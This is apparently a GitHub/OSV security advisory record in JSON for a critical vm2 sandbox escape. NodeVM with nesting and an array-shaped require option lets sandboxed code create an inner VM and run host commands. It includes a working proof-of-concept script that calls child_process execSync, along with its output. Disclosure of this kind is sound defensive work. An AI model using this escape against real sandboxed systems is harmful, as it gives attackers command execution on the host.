{"id":"GHSA-8hr7-r645-pc6w","summary":"vm2: NodeVM nesting guard accepts array-shaped require and permits host RCE","details":"## Summary\n\nThe `NodeVM` constructor computes `hasRealRequireConfig` using `typeof requireOpts === 'object' && requireOpts !== null`, so `require: []` bypasses the guard intended to reject `nesting` without an explicit require configuration. `makeResolverFromLegacyOptions()` then destructures the array to undefined option fields and returns a resolver containing only `NESTING_OVERRIDE.vm2`. Any attacker whose JavaScript is executed by a downstream `NodeVM` configured with `{nesting: true, require: []}` can load the host `vm2` module, create an inner `NodeVM` with an attacker-selected builtin allowlist, and execute commands as the host process. No equivalent plain-object validation exists in `makeResolverFromLegacyOptions()`.\n\nArray is converted into the vm2-only resolver:\nhttps://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/resolver-compat.js#L205-L226\n\nNesting loader returns the host VM constructors:\nhttps://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/nodevm.js#L640-L645\n\n## Proof of Concept\n\nPreconditions:\n\n- The host creates `NodeVM` with truthy `nesting` and array-shaped `require`.\n- The attacker can supply JavaScript executed by that `NodeVM`.\n\n```javascript\n'use strict';\n\nconst {NodeVM} = require('./index.js');\n\nconst outer = new NodeVM({nesting: true, require: []});\nconst result = outer.run(`\n\tconst {NodeVM} = require('vm2');\n\tconst inner = new NodeVM({require: {builtin: ['child_process']}});\n\tmodule.exports = inner.run(\n\t\t\"module.exports = require('child_process').execSync('id').toString()\"\n\t);\n`);\n\nconsole.log(result);\n```\n\n```text\nuid=1000(lohar) gid=1000(lohar) groups=1000(lohar)\n```\n\nThe `hasRealRequireConfig` guard fails open because it returns `true` for arrays, although arrays are not `VMRequire` configuration objects. `makeResolverFromLegacyOptions()` applies object destructuring to the array, obtains undefined `builtin` and `external` values, merges `NESTING_OVERRIDE`, and returns before any external-module control is relevant. Outer builtin restrictions do not constrain the attacker-created inner `NodeVM`, whose `require` configuration is selected inside the sandbox.\n\nFailed shape check:\nhttps://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/nodevm.js#L304-L307\n\n## Impact\n\nAn attacker can execute arbitrary commands with the host Node.js process privileges, including reading secrets, modifying files, and accessing the host network. GHSA-m4wx-m65x-ghrr covers the same nesting primitive but does not cover array-shaped `require` values and incorrectly identifies 3.11.4 as patched. \n\n\u003e Exploitation is limited to downstream applications that enable `nesting` and pass the malformed array configuration.","aliases":["CVE-2026-92935"],"modified":"2026-10-01T15:45:08.016192815Z","published":"2026-10-01T15:34:58Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-913"],"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-10-01T15:34:58Z"},"references":[{"type":"WEB","url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-8hr7-r645-pc6w"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-92935"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/commit/05894eca1dc6a2b1a986f312c88255288a983d22"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/commit/54b54b74a382577f0bcd0538c5bf99acdcd7f53b"},{"type":"PACKAGE","url":"https://github.com/patriksimek/vm2"},{"type":"WEB","url":"https://github.com/patriksimek/vm2/releases/tag/v3.11.7"},{"type":"WEB","url":"https://www.vulncheck.com/advisories/vm2-nodevm-remote-code-execution-via-array-shaped-require"}],"affected":[{"package":{"name":"vm2","ecosystem":"npm","purl":"pkg:npm/vm2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"3.11.4"},{"fixed":"3.11.7"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 3.11.6","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-8hr7-r645-pc6w/GHSA-8hr7-r645-pc6w.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H"}]}